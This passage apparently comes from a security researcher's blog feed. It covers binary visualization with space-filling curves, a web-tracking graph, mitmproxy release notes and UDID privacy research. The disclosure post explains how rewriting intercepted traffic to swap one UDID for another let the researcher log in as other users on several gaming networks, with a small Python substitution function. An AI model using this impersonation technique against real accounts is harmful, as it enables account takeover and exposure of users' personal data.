About 700 of my subscriptions are to the RSS feeds of individual users on
<a href="http://pinboard.in">Pinboard</a> and <a href="http://delicious.com">Delicious</a>. This gives
me very fine control and a great mix of interests. Plus, getting links from
individual curators handily sidesteps the social news group-think problem. The
remainder of my subscriptions are split between blogs, some sub-Reddits, a few
Twitter users and subsections of <a href="http://arxiv.org">arXiv</a>.</p>
<p>So much for how my intake works. Just as important is the way that I consume
it. I do my "filtering" in batches, usually in the evening. Using
<a href="http://reederapp.com/">Reeder</a> on my iPad works well for me, letting me flick
quickly and comfortably through all the new links of the day. When I find
something that looks interesting, I resist the temptation to read it then and
there - instead, I batch up all my reading for later. If it's a web page, it
goes to <a href="http://www.instapaper.com/">Instapaper</a>. If it's a PDF, it gets
downloaded into a <a href="http://www.dropbox.com/">DropBox</a> folder, which is synced to
<a href="http://www.goodiware.com/goodreader.html">GoodReader</a>.</p>
<p>Finally, the actual reading. Every morning, I toddle off to a nice cafe with my
iPad, and read all the interesting stuff I saved the previous day in a single
sitting. I'm ruthless about just skimming things that don't warrant careful
attention. If I find something particularly interesting I save it permanently,
and perhaps tweet it or mail it to someone I think might be interested.</p>
<h2 id="problems-and-a-product-idea">Problems - and a product idea?</h2>
<p>This system works for me, but it has many problems. There's no end-to-end
coordination, so by the time I sit down to actually read something, I have no
easy way to tell which feed it came from. Google Reader sucks at managing
hundreds of low-volume subscriptions. Reeder is great, but not tailored to
consuming redundant information from many sources. The end result is that
maintaining the system I have is a time-consuming pain in the ass. The fact
that it's still worth it despite this makes me think there might be commercial
room for a better solution.</p>
<p>Which brings me to a rough product idea - a formalized version of this link
mill for people who want to take direct control of their information intake.
The business end is a generalized feed consumer, letting you subscribe to RSS
feeds, Twitter users, Google+ updates, sub-Reddits and other information
sources. Links are extracted from these feeds, keeping track of which links
appeared where. The user is then presented with a stream of links to consume,
de-duplicated so that those appearing in multiple feeds are presented only
once. The system keeps track of links the user marks as "interesting", batching
them for later consumption. It also uses this information to score the feeds,
letting the user see which feeds are low quality, and should be ditched. Given
the right tools, the time needed for a user to maintain and tend their link
feed garden would be quite modest, and the rewards would be great.</p>
<p>If someone built this, I for one would gladly fork over some of my hard-earned
doubloons to use it. In fact, with some validation of the idea and a few
collaborators I might think of building it myself. Does this sound useful to
anyone else?</p>
Visualizing binaries with space-filling curves
2011-12-23T00:00:00+00:00
2011-12-23T00:00:00+00:00
https://corte.si/posts/visualisation/binvis/
<p><b>Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at <a href="http://binvis.io">binvis.io</a></b></p>
<p>In my day job I often come across binary files with unknown content. I have a
set of standard avenues of attack when I confront such a beast - use "file" to
see if it's a known file type, "strings" to see if there's readable text, run
some in-house code to extract compressed sections, and, of course, fire up a hex
editor to take a direct look. There's something missing in that list, though - I
have no way to get a quick view of the overall structure of the file. Using a
hex editor for this is not much chop - if the first section of the file looks
random (i.e. probably compressed or encrypted), who's to say that there isn't a
chunk of non-random information a meg further down? Ideally, we want to do this
type of broad pattern-finding by eye, so a visualization seems to be in order.</p>
<p>First, let's begin by picking a colour scheme. We have 256 different byte values,
but for a first-pass look at a file, we can compress that down into a few common
classes:</p>
<table>
<tr>
<td style="background-color: #000000"> </td>
<td>0x00</td>
</tr>
<tr>
<td style="background-color: #ffffff"> </td>
<td>0xFF</td>
</tr>
<tr>
<td style="background-color: #377eb8"> </td>
<td>Printable characters</td>
</tr>
<tr>
<td style="background-color: #e41a1c"> </td>
<td>Everything else</td>
</tr>
</table>
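<p>A sketch of this classification in Python - the hex colours come from the
table above, while treating 0x20-0x7e as the printable range is my assumption
rather than the actual binvis source:</p>

```python
def byte_class_colour(b: int) -> str:
    """Map a byte value to one of the four classes in the table."""
    if b == 0x00:
        return "#000000"  # zero bytes (common padding)
    if b == 0xFF:
        return "#ffffff"  # 0xFF bytes (also common padding)
    if 0x20 <= b <= 0x7E:
        return "#377eb8"  # printable ASCII
    return "#e41a1c"      # everything else

colours = [byte_class_colour(b) for b in b"A\x00\xff\x01"]
```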
<p>This covers the most common padding bytes, nicely highlights strings, and lumps
everything else into a miscellaneous bucket. The broad outline of what we need
to do next is clear - we sample the file at regular intervals, translate each
sampled byte to a colour, and write the corresponding pixel to our image. This
brings us to the big question - what's the best way to arrange the pixels? A
first stab might be to lay the pixels out row by row, snaking to and fro to make
sure each pixel is always adjacent to its predecessor. It turns out, however,
that this zig-zag pattern is not very satisfying - small scale features (i.e.
features that take up only a few lines) tend to get lost. What we want is a
layout that maps our one-dimensional sequence of samples onto the 2-d image,
while keeping elements that are close together in one dimension as near as
possible to each other in two dimensions. This is called "locality
preservation", and the <a href="http://en.wikipedia.org/wiki/Space-filling_curve">space-filling
curves</a> are a family of
mathematical constructs that have precisely this property. If you're a regular
reader of this blog, you may know that I have an
<a href="https://corte.si/posts/code/hilbert/portrait/">almost</a>
<a href="https://corte.si/posts/code/sortvis-fruitsalad/">unseemly</a>
<a href="https://corte.si/posts/code/hilbert/swatches/">fondness</a> for these critters. So, let's
add a couple of space-filling curves to the mix to see how they stack up. The
<a href="http://en.wikipedia.org/wiki/Z-order_curve">Z-Order curve</a> has found wide
practical use in computer science. It's not the best in terms of locality
preservation, but it's easy and quick to compute. The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert
curve</a>, on the other hand, is
(nearly) as good as it gets at locality preservation, but is much more
complicated to generate. Here's what our three candidate curves look like - in
each case, the traversal starts in the top-left corner:</p>
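<p>For reference, the Hilbert layout can be generated with the classic
bit-twiddling construction that maps a distance along the curve to grid
coordinates. This is the textbook algorithm, not necessarily the exact code in
scurve:</p>

```python
def hilbert_d2xy(order: int, d: int) -> tuple[int, int]:
    """Map distance d along a Hilbert curve to (x, y) on a
    2**order by 2**order grid, starting at (0, 0)."""
    x = y = 0
    s, t = 1, d
    while s < (1 << order):
        rx = 1 & (t // 2)
        ry = 1 & (t ^ rx)
        if ry == 0:  # rotate/flip the quadrant as needed
            if rx == 1:
                x, y = s - 1 - x, s - 1 - y
            x, y = y, x
        x += s * rx
        y += s * ry
        t //= 4
        s *= 2
    return x, y

# Consecutive distances always land on adjacent cells - exactly the
# locality property the visualization relies on.
```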
<div class="container">
<div class="row">
<div class="column">
<img src="zigzag.png"/>
<h4>Zigzag</h4>
</div>
<div class="column">
<img src="zorder.png"/>
<h4>Z-order</h4>
</div>
<div class="column">
<img src="hilbert.png"/>
<h4>Hilbert</h4>
</div>
</div>
</div>
<p>And here they are, visualizing the
<a href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a>
(<a href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a>,
<a href="http://en.wikipedia.org/wiki/Fat_binary">dual-architecture</a>) binary
distributed with OSX - click for the significantly more spectacular larger
versions of the images:</p>
<div class="container">
<div class="row">
<div class="column">
<a href="binary-large-zigzag.png"><img src="binary-zigzag.png"/></a>
<h4>Zigzag</h4>
</div>
<div class="column">
<a href="binary-large-zorder.png"><img src="binary-zorder.png"/></a>
<h4>Z-order</h4>
</div>
<div class="column">
<a href="binary-large-hilbert.png"><img src="binary-hilbert.png"/></a>
<h4>Hilbert</h4>
</div>
</div>
</div>
<p>The classical Hilbert and Z-Order curves are actually square, so for these
visualizations I've unrolled them, stacking four sub-curves on top of each
other. To my eye, the Hilbert curve is the clear winner here. Local features
are prominent because they are nicely clumped together. The Z-order curve shows
some annoying artifacts with contiguous chunks of data sometimes split between
two or more visual blocks.</p>
<p>The downside of the space-filling curve visualizations is that we can't look at
a feature in the image and tell where, exactly, it can be found in the file.
I'm toying with the idea (though not very seriously) of writing an interactive
binary file viewer with a space-filling curve navigation pane. This would let
the user click on or hover over a patch of structure and see the file offset
and the corresponding hex.</p>
<h2 id="more-detail">More detail</h2>
<p>We can get more detail in these images by increasing the granularity of the
colour mapping. One way to do this is to use a trick I first concocted to
<a href="https://corte.si/posts/code/hilbert/portrait/">visualize the Hilbert Curve at
scale</a>. The basic idea is to use a
3-d Hilbert curve traversal of the RGB colour cube to create a palette of
colours. This makes use of the locality-preserving properties of the Hilbert
curve to make sure that similar elements have similar colours in the
visualization. See the <a href="https://corte.si/posts/code/hilbert/portrait/">original
post</a> for more.</p>
<p>So, here's a Hilbert curve mapping of a binary file, using a Hilbert-order
traversal of the RGB cube as a colour palette. Again, click on the image for
the much nicer large scale version:</p>
<div class="media">
<a href="hilbert-hilbert-large.png">
<img src="hilbert-hilbert.png" />
</a>
</div>
<p>This shows significantly more fine-grained structure, which might be good for a
deep dive into a binary. On the other hand, the colours don't map cleanly to
distinct byte classes, so the image is harder to interpret. An ideal hex viewer
would let you flick between the two palettes for navigation.</p>
<h2 id="the-code">The code</h2>
<p>As usual, I'm publishing the code for generating all of the images in this
post. The binary visualizations were created with
<a href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, which is a new
addition to <a href="https://github.com/cortesi/scurve">scurve</a>, my space-filling curve
project. The curve diagrams were made with the "drawcurve" utility to be found
in the same place.</p>
netograph.com - Realtime privacy snapshots of the social web
2011-12-08T00:00:00+00:00
2011-12-08T00:00:00+00:00
https://corte.si/posts/netograph/launch/
<p>Today, I'm launching <a href="http://netograph.com">Netograph</a>, a new privacy-related
site that I've been hacking on over the past few months. The goal of the project
is to provide you with a quick overview of the privacy picture for a URL,
<strong>before</strong> you've clicked on the link. At the moment, Netograph scans
<a href="http://reddit.com">Reddit</a>, <a href="http://news.ycombinator.com">Hacker News</a>,
<a href="http://pinboard.in">Pinboard</a>, <a href="http://delicous.com">Delicious</a> and
<a href="http://digg.com">Digg</a> - links on these sites should show up within a few
minutes of submission.</p>
<p>For more details, head over to <a href="http://netograph.com">netograph.com</a>. There you
will also find
<a href="https://addons.mozilla.org/en-US/firefox/addon/netograph/">Firefox</a> and
<a href="https://chrome.google.com/webstore/detail/bfhmbldbigkpniinkmckafbgcajcbaai">Chrome</a>
browser addons that let you view the Netograph report for a URL instantly with a
right-click. Enjoy!</p>
<div class="container">
<div class="row">
<div class="column">
<a href="http://netograph.com/starmap/1740">
<img src="ng-guardian.png">
guardian.co.uk
</a>
</div>
<div class="column">
<a href="http://netograph.com/starmap/2512">
<img src="ng-techcrunch.png">
techcrunch.com
</a>
</div>
<div class="column">
<a href="http://netograph.com/starmap/2457">
<img src="ng-reddit.png">
reddit.com
</a>
</div>
</div>
</div>
<h2 id="what-s-next">What's next?</h2>
<p>This is just the first step. As I hinted in a <a href="https://corte.si/posts/privacy/neighbourhoods-of-trust/">previous
post</a>, the most interesting
results from Netograph are likely to come from aggregating and
cross-correlating the data for individual URLs. I'm already hard at work on
this - the next iteration of Netograph will aim to shine some light on the
sometimes shadowy network of third-parties that track and analyze nearly every
URL we visit. I will also be publishing some interesting tidbits from this data
corpus on my blog as I go along, so watch this space.</p>
Otago Polytechnic Talk
2011-10-31T00:00:00+00:00
2011-10-31T00:00:00+00:00
https://corte.si/posts/talks/polytech/
<p>Further reading for the guest lecture I'm giving at Otago Polytechnic today:</p>
<ul>
<li>The talk I'm not giving: <a href="https://www.owasp.org/index.php/Top_10_2010-Main">OWASP Top
10</a></li>
<li>Tools: <a href="http://getfirebug.com/">FireBug</a>,
<a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">TamperData</a>,
<a href="http://python.org">Python</a>.</li>
<li>The <a href="http://en.wikipedia.org/wiki/Samy_(XSS)">Myspace Worm</a>, and
Samy Kamkar's <a href="http://namb.la/popular/tech.html">own explanation of the
exploit</a>.</li>
<li>Halvar Flake's <a href="http://www.immunityinc.com/infiltrate/2011/presentations/Fundamentals_of_exploitation_revisited.pdf">Programming and state
machines</a>,
which is where I first saw the term "programming the weird machine".</li>
</ul>
Neighborhoods of trust on the web
2011-09-27T00:00:00+00:00
2011-09-27T00:00:00+00:00
https://corte.si/posts/privacy/neighbourhoods-of-trust/
<p>For the last fortnight I've been hard at work on a new project that aims to
examine trust and security on the web at scale. The basic idea is to use a
browser instance to render a URL, and then to extract all persistent state with
browser forensic techniques afterwards. This gives you a dump of cookies, cache
contents, Flash storage, HTML5 databases, and so on. At the same time, all
traffic is routed through a specialised version of
<a href="http://mitmproxy.org">mitmproxy</a>, and captured for later analysis. The result
is a very detailed snapshot of what viewing a given URL actually <em>does</em>. The
next step is to do this "at scale" - this means running many instances of this
process in parallel on headless servers, decoupling things using queues, backing
it all onto a database, and then spending days and days fine-tuning. I'm happy
with my progress so far - my infrastructure is now scanning all the URLs
passing through <a href="http://news.ycombinator.com">Hacker News</a>,
<a href="http://reddit.com">Reddit</a>, <a href="http://digg.com">Digg</a>,
<a href="http://delicious.com">Delicious</a> and <a href="http://pinboard.in">Pinboard</a> in
realtime, without breaking a sweat.</p>
<p>I am pretty excited about the possibilities for this project, and I'm exploring
plans for the future with like-minded security folk. Get in touch if this
interests you, and keep an eye on my blog for more news.</p>
<p>After my pilot run, I had 150 gigs of data covering about 120 thousand URLs.
Below is a quick peek at one tiny slice of this data - an appetizer for things
to come.</p>
<h2 id="neighborhoods-of-trust">Neighborhoods of trust</h2>
<div class="media">
<a href="full.png">
<img src="wholegraph.png" />
</a>
</div>
<p>This graph shows structures that emerge from the way sites use third-party
executable resources. In this context, "executable" means JavaScript,
Flash and HTML, and "third-party" means domains other than the URL's own. The
nodes in this graph are the third-party domains, and the edges are associations
between them via the URLs I crawled. For example, if a site loaded scripts from
both Google Analytics and from Doubleclick, that would create (or reinforce) an
edge between the nodes "google-analytics.com" and "doubleclick.net". Using
this data, I calculated a co-occurrence coefficient for the third-party
sources, and then extracted the resulting neighbourhood structures
<a href="http://lanl.arxiv.org/abs/0803.0476">algorithmically</a>. The neighbourhood
information was used to colour and lay out the graph, trying to keep nodes that
are closely correlated together. Finally, nodes are scaled based on how many
URLs reference them.</p>
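<p>The edge-counting step described above can be sketched in a few lines of
Python. This is an illustration of the idea rather than the actual pipeline
(which used graph-tool); the crawl data shown is invented:</p>
<pre>
<code>from collections import Counter
from itertools import combinations

def cooccurrence_edges(crawls):
    """Count co-occurrence edges between third-party domains.

    `crawls` maps each crawled URL to the set of third-party domains
    it loaded executable resources from. Every unordered pair of
    domains seen together on a URL creates (or reinforces) an edge.
    """
    edges = Counter()
    for domains in crawls.values():
        for pair in combinations(sorted(domains), 2):
            edges[pair] += 1
    return edges

# Hypothetical crawl results, for illustration only:
crawls = {
    "http://example.com/a": {"google-analytics.com", "doubleclick.net"},
    "http://example.com/b": {"google-analytics.com", "doubleclick.net",
                             "quantserve.com"},
}
edges = cooccurrence_edges(crawls)
# The GA/DoubleClick edge was reinforced by both URLs:
print(edges[("doubleclick.net", "google-analytics.com")])
</code></pre>
<p>From the resulting edge weights one can then derive a co-occurrence
coefficient and run community extraction, as described above.</p>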
<p>The result is a rather stunning graph showing neighborhoods of trust - areas of
the Internet bound together based on the third parties allowed to run code in
users' browsers. I've spent a few hours playing with this data, and the sheer
range of interesting structure is surprising. At one end of the spectrum, you
can zoom in to the individual node relationships, and find small clusters of
surprising sites that cross-load resources from each other, often because they
are owned by the same entity. At the other end, countries, language groups, and
broad fields of interest aggregate in huge tribes of kinship.</p>
<p>Here are a few of the larger-scale features from the graph.</p>
<h3 id="mainstream">Mainstream</h3>
<div class="media">
<a href="wholegraph-b.png">
<img src="wholegraph-b.png" />
</a>
</div>
<p>The most widely used resources dominate in the neighbourhood
extraction algorithm, which causes them to cluster together in
their own super-community. The top nodes in this cluster, in
descending order of occurrence, are: google-analytics.com,
facebook.com, doubleclick.net, fbcdn.net, quantserve.com,
twitter.com, google.com, googlesyndication.com, googleapis.com,
scorecardresearch.net, facebook.net, addthis.com. These are
also the top nodes overall.</p>
<h3 id="japanese">Japanese</h3>
<div class="media">
<a href="wholegraph-a.png">
<img src="wholegraph-a.png" />
</a>
</div>
<p>The main resources are hatena.ne.jp, microad.jp, mixi.jp,
yahoo.co.jp and nakanohito.jp. More surprisingly, topsy.com,
appspot.com and postrank.com also appear in this cluster - perhaps
these services are particularly common on Japanese sites.</p>
<h3 id="russian">Russian</h3>
<div class="media">
<a href="wholegraph-d.png">
<img src="wholegraph-d.png" />
</a>
</div>
<p>Top resources are yadro.ru, yandex.ru, rambler.ru, vkontakte.ru,
openstat.net, userapi.com, shinystat.net, and dt00.net.</p>
<h3 id="porn">Porn</h3>
<div class="media">
<a href="wholegraph-c.png">
<img src="wholegraph-c.png" />
</a>
</div>
<p>And here we have a portion of the web dedicated to porn. The top
resources are awempire.com, clickbank.net, picadmedia.com,
getresponse.com, adultfriendfinder.com, adultadword.com, phcdn.com,
juicyads.com, brazzers.com, etology.com, data-ero-advertising.com
and viddler.com. A more surprising inclusion in this group is
wufoo.com - I wonder if this is an artifact, or whether Wufoo
really does have a use in the adult content world.</p>
<h3 id="misc">Misc</h3>
<div class="media">
<a href="wholegraph-e.png">
<img src="wholegraph-e.png" />
</a>
</div>
<p>Just to show that it's not all clear-cut, here's an example of a
neighbourhood I find harder to explain. The top resources are
netdna-cdn.com, amgdgt.com, trafficmp.com, ooyala.com,
suitesmart.com, demdex.net, adfrontiers.com, lycos.com and
break.com. I speculate that this group might be loosely aligned
around a number of big CDNs and analysis suites.</p>
<h2 id="tech">Tech</h2>
<p>The graph in this post was created, analyzed and pre-processed using
<a href="http://projects.skewed.de/graph-tool/">graph-tool</a>, a great Python library for
dealing with large graphs. The visualization and modularity analysis were done
using the ever-wonderful <a href="http://gephi.org/">Gephi</a>. If these aren't both in
your arsenal of analysis tools, you're missing out.</p>
Why the Apple UDID had to die
2011-09-09T00:00:00+00:00
2011-09-09T00:00:00+00:00
https://corte.si/posts/security/udid-must-die/
<p><strong>EDIT: A <a href="http://blogs.wsj.com/digits/2011/09/19/privacy-risk-found-on-cellphone-games/">WSJ Digits
article</a>
is now up, containing responses from Zynga and Chillingo. Other networks
declined to comment.</strong></p>
<p>A UDID is a "Unique Device Identifier" - you can think of it as a serial number
burned permanently into every iPhone, iPad and iPod Touch. Any installed app can
access the UDID without requiring the user's knowledge or consent. We know that
UDIDs are very widely used - in a sample of 94 apps I tested, <a href="https://corte.si/posts/security/apple-udid-survey/">74% silently sent
the UDID to one or more servers on the
Internet</a>, often without
encryption. This means that UDIDs are not secret values - if you use an Apple
device regularly, it's certain that your UDID has found its way into scores of
databases you're entirely unaware of. Developers often assume UDIDs are
anonymous values, and routinely use them to aggregate detailed and sensitive
user behavioural information. One example is Flurry, a mobile analytics firm
used by 15% of apps I tested, which can monitor application startup, shutdown,
scores achieved, and a host of other application-specific events, all linked to
the user's UDID. I recently showed that it was possible to use
<a href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a>, a large mobile social
gaming network, to <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">de-anonymize
UDIDs</a>, linking them
to usernames, email addresses, GPS locations, and even Facebook profiles.</p>
<p>This post looks at the way UDIDs are used in the broader social gaming
ecosystem. The work is based on a simple question: what happens if we swap our
UDID for another while communicating with the network? There are a number of
ways to do this - in my case I used <a href="http://mitmproxy.org">mitmproxy</a>, an
intercepting HTTP/S proxy I developed which lets me re-write the traffic leaving
a device on the fly. In most cases this was a simple matter of replacing one
string with another, but two networks (Scoreloop and Crystal) prevented UDID
substitution using cryptography. Unfortunately, both networks relied on the
secrecy of key material distributed in the application binaries to every device.
I have verified that it is possible to reverse engineer the application binaries
to extract the key material and circumvent the cryptographic protection.</p>
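<p>For the networks without cryptographic protection, the substitution step
amounts to a one-line rewrite of the intercepted traffic. The sketch below
illustrates the idea; it is not the actual mitmproxy script I used, and the
function name and sample request are invented:</p>
<pre>
<code>import re

def swap_udid(raw_request: str, real_udid: str, fake_udid: str) -> str:
    """Rewrite intercepted traffic, replacing one UDID with another.

    UDIDs are hex strings, so match case-insensitively to catch both
    upper- and lower-cased transmissions.
    """
    return re.sub(re.escape(real_udid), fake_udid, raw_request,
                  flags=re.IGNORECASE)

request = "GET /users/for_device.xml?udid=A1B2C3 HTTP/1.1"
print(swap_udid(request, "a1b2c3", "FFFF00"))
</code></pre>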
<p>The outcome of this experiment shows that social gaming networks systematically
misuse UDIDs, resulting in serious privacy breaches for their users. All the
networks I tested allowed UDIDs to be linked to potentially identifying user
information, ranging from usernames to email addresses, friends lists and
private messages. Furthermore, 5 of the 7 networks allow an attacker to log in
as a user using only their UDID, giving the attacker complete control of the
user's account. Two networks had further problems that compromised a user's
Facebook and Twitter accounts - Crystal lets an attacker take control of a user's
accounts by leaking API keys, while Scoreloop partially discloses users' friends
lists, even if they are private.</p>
<style>
.yes {
background-color: #d55858;
color: #000000;
}
.no {
background-color: #5bd65b;
color: #000000;
}
</style>
<table>
<tr>
<th></th>
<th>Data leaked</th>
<th>Login as user</th>
<th>Social Media Accounts</th>
</tr>
<tr>
<th><a href="http://www.chillingo.com/">Crystal</a></th>
<td class="yes"> Username, friends, Facebook, Twitter, games played, location, email address </td>
<td class="yes"> Yes </td>
<td class="yes"> Control of Facebook, Twitter accounts</td>
</tr>
<tr>
<th><a href="http://www.gameloft.com/">GameLoft</a></th>
<td class="yes"> Username, email address, games played, nationality, friends </td>
<td class="yes"> Yes </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://www.geocade.com/">Geocade</a></th>
<td class="yes"> Username, email address, games played, location </td>
<td class="yes"> Yes </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://openfeint.com/">OpenFeint</a></th>
<td class="yes"> Username, last played game, online status, friends </td>
<td class="yes"> Yes </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://www.scoreloop.com/">Scoreloop</a></th>
<td class="yes"> Email address, gender, username, nationality, friends </td>
<td class="yes"> Yes </td>
<td class="yes"> Access private Facebook and Twitter friends lists </td>
</tr>
<tr>
<th><a href="http://plusplus.com/">Plus+</a></th>
<td class="yes"> Username </td>
<td class="no"> No </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://www.zynga.com/">Zynga</a></th>
<td class="yes"> First name, username, friends*, in-game messages*,
mobile number*</td>
<td class="yes"> Yes* </td>
<td class="no"> No </td>
</tr>
</table>
<p>* The starred Zynga findings rely on the fact that other networks can be used
to obtain the user's email address using the UDID.</p>
<p>There are two caveats to keep in mind while considering these results. First,
the findings are based on the default settings for each social network - some
networks may have settings that reduce the amount of information exposed.
Second, some of the data leaked is optional - for instance, it's not mandatory
for a user to link Facebook or Twitter accounts with any of the networks.</p>
<p>All the affected companies and Apple were notified 5 weeks ago. The Crystal and
Scoreloop teams have both repaired the problems that could lead to a follow-on
compromise of a user's social network accounts. At the time of writing, it is
still possible to log in as a user using only a UDID on five of the vulnerable
networks.</p>
<h2 id="the-future">The future</h2>
<p>A few days after I notified the companies involved, it was revealed that Apple
was <a href="http://techcrunch.com/2011/08/19/apple-ios-5-phasing-out-udid/">quietly killing the UDID
API</a>. It will
still be present in iOS 5, but is marked deprecated, and will probably be
removed in future. I recommend that developers shift away from using UDIDs now,
rather than wait for formal removal of the API.</p>
<p>We can now expect a frenzy of activity as developers look for alternatives. The
challenge will be to make sure that the cure isn't as bad as the disease -
Apple's recommendation to "create a unique identifier specific to your app"
could tempt developers to replicate the UDID mechanism on a smaller scale,
flaws and all. Expect more blog posts on this topic soon.</p>
mitmproxy 0.6
2011-08-07T00:00:00+00:00
2011-08-07T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_6/
<div class="media">
<a href="../mitmproxy_0_4.png">
<img src="../mitmproxy_0_4.png" />
</a>
</div>
<p>I'm happy to announce the release of mitmproxy 0.6, featuring a redesigned
scripting API, a slew of major new features and a panoply of small bugfixes and
improvements.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>New scripting API that allows much more flexible and fine-grained
rewriting of traffic. See the docs for more info.</li>
<li>Support for gzip and deflate content encodings. A new "z"
keybinding in mitmproxy to let us quickly encode and decode content, plus
automatic decoding for the "pretty" view mode.</li>
<li>An event log, viewable with the "v" shortcut in mitmproxy, and the "-e"
commandline argument in both mitmproxy and mitmdump.</li>
<li>Huge performance improvements both in the mitmproxy interface, and in loading
large numbers of flows from file.</li>
<li>A new "replace" convenience method for all flow objects, that does a
universal regex-based string replacement.</li>
<li>Header management has been rewritten to maintain both case and order.</li>
<li>Improved stability for SSL interception.</li>
<li>Default expiry time on generated SSL certs has been dropped to avoid an
OpenSSL overflow bug that caused certificates to expire in the distant
past on some systems.</li>
<li>A "pretty" view mode for JSON and form submission data.</li>
<li>Expanded documentation and examples.</li>
<li>Many other small improvements and bugfixes.</li>
</ul>
mitmproxy 0.5
2011-06-27T00:00:00+00:00
2011-06-27T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_5/
<div class="media">
<a href="../mitmproxy_0_4.png">
<img src="../mitmproxy_0_4.png" />
</a>
</div>
<p>I've just tagged and released mitmproxy 0.5. Everyone should update - this
release squelches a few annoying performance killers. You can download it from
the project website:</p>
<h2 id="mitmproxy-org"><a href="http://mitmproxy.org">mitmproxy.org</a></h2>
<h2 id="changelog">Changelog</h2>
<ul>
<li>An -n option to start the tools without binding to a proxy port.</li>
<li>Allow scripts, hooks, sticky cookies etc. to run on flows loaded from
save files.</li>
<li>Regularize command-line options for mitmproxy and mitmdump.</li>
<li>Add an "SSL exception" to mitmproxy's license to remove possible
distribution issues.</li>
<li>Add a --cert-wait-time option to make mitmproxy pause after a new SSL
certificate is generated. This can pave over small discrepancies in
system time between the client and server.</li>
<li>Handle viewing big request and response bodies more elegantly. Only
render the first 100k of large documents, and try to avoid running the
XML indenter on non-XML data.</li>
<li><strong>BUGFIX</strong>: Make the "revert" keyboard shortcut in mitmproxy work after a
flow has been replayed.</li>
<li><strong>BUGFIX</strong>: Repair a problem that sometimes caused SSL connections to consume
100% of CPU.</li>
</ul>
UDID media roundup
2011-06-10T00:00:00+00:00
2011-06-10T00:00:00+00:00
https://corte.si/posts/security/udid-media-roundup/
<p>After a hectic month, I'm finally able to return to the UDID privacy issues I
covered in my last few blog posts. I plan to publish some further results soon,
but first, a quick roundup of the media coverage of the <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">OpenFeint UDID
de-anonymization
result</a>.</p>
<ul>
<li><a href="http://blogs.wsj.com/digits/2011/05/11/the-privacy-risks-of-id-codes-in-your-apps/">A post on the Wall Street Journal tech
blog</a>
by <a href="http://www.jennifervalentinodevries.com/">Jennifer Valentino-DeVries</a>, one
of the very few journalists who do good, novel investigative work into issues
like UDID privacy.</li>
<li>An interview with <a href="http://www.repubblica.it/tecnologia/2011/06/03/news/identificativo_iphone-17073898/">La
Repubblica</a>,
a major Italian daily.</li>
<li>An article in <a href="http://www.spiegel.de/netzwelt/gadgets/0,1518,761735,00.html">Der Spiegel</a>.</li>
<li>Coverage on <a href="http://articles.cnn.com/2011-05-09/tech/identity.iphones.ipads_1_apps-identifier-privacy?_s=PM:TECH">CNN
online</a>,
<a href="http://www.wired.com/gadgetlab/2011/05/iphone-udid/">Wired Gadgetlab</a> and the
<a href="http://www.huffingtonpost.com/2011/05/10/iphone-udid-personal-information-identity_n_860139.html">Huffington
Post</a>.</li>
<li>And, last but not least, a <a href="http://netsecpodcast.com/?p=772">nice 30-minute
interview</a> with <a href="https://twitter.com/#!/quine">Zach
Lanier</a> from the <a href="http://netsecpodcast.com/">Network Security
Podcast</a>. This is your opportunity to get some more
details on the OpenFeint issue and find out what a weird accent I have.</li>
</ul>
<p>The issue was also mentioned on many, many blogs and smaller publications.</p>
How UDIDs are used: a survey
2011-05-19T00:00:00+00:00
2011-05-19T00:00:00+00:00
https://corte.si/posts/security/apple-udid-survey/
<p>I recently published some
<a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">research</a> showing
that the OpenFeint social gaming network can be used to link Apple UDIDs to
users' real-world identities. To understand why this is a problem, we have to
look at the way UDIDs are used in the broader app ecosystem. Once we do this, we
see that the vast majority of applications send UDIDs to servers on the
Internet, and that UDID-linked user information is aggregated in literally
thousands of databases on the net. In this context, UDID de-anonymization is a
serious threat to user privacy.</p>
<p>We have one good research paper surveying UDID use - in 2010, Eric Smith <a href="http://www.pskl.us/wp/?p=476">looked
at the unencrypted portion of app traffic</a>, and
found that 68% of tested apps send UDIDs upstream in the clear. I was curious to
see what the figures would look like if encrypted (HTTPS) traffic was included,
so I decided to do my own survey, using <a href="http://mitmproxy.org">mitmproxy</a> to
analyse all traffic from the 94 applications I had installed on my iPhone. Below
is a set of graphs highlighting the main facts. I've also published a list of
all applications and the domains they contacted <a href="https://corte.si/posts/security/apple-udid-survey/appdomains.html">here</a> - it
makes for interesting reading.</p>
<h2 id="apps-are-noisier-than-you-think-they-are">Apps are noisier than you think they are</h2>
<div class="media">
<a href="all_domains.png">
<img src="all_domains.png" />
</a>
</div>
<p>84% of apps tested contacted one or more domains during use. At the extreme end,
<a href="http://itunes.apple.com/us/app/idestroy-wicked-sick-stress/id309689677?mt=8">iDestroy</a>
contacted 14 domains, including 3 different ad networks and OpenFeint.</p>
<h2 id="and-send-your-udid-to-more-places-than-you-expect">... and send your UDID to more places than you expect</h2>
<div class="media">
<a href="udid_domains.png">
<img src="udid_domains.png" />
</a>
</div>
<p>74% of apps tested sent the device UDID to one or more domains.</p>
<h2 id="often-without-encryption">... often without encryption</h2>
<div class="media">
<a href="udid_scheme.png">
<img src="udid_scheme.png" />
</a>
</div>
<p>46% of apps that transmitted UDIDs did so in the clear. 54% of apps
transmitting UDIDs used encryption for all UDID traffic<sup class="footnote-reference"><a href="#1">1</a></sup>.</p>
<h2 id="a-few-big-udid-aggregators-dominate">A few big UDID aggregators dominate</h2>
<div class="media">
<a href="topdomains.png">
<img src="topdomains.png" />
</a>
</div>
<p>Three big aggregators of UDID-related data dominate: <a href="http://apple.com">Apple</a>,
<a href="http://www.flurry.com">Flurry</a>, and <a href="http://www.openfeint.com">OpenFeint</a>. Each
one of these companies has the vast majority of UDIDs on file, linked to a rich
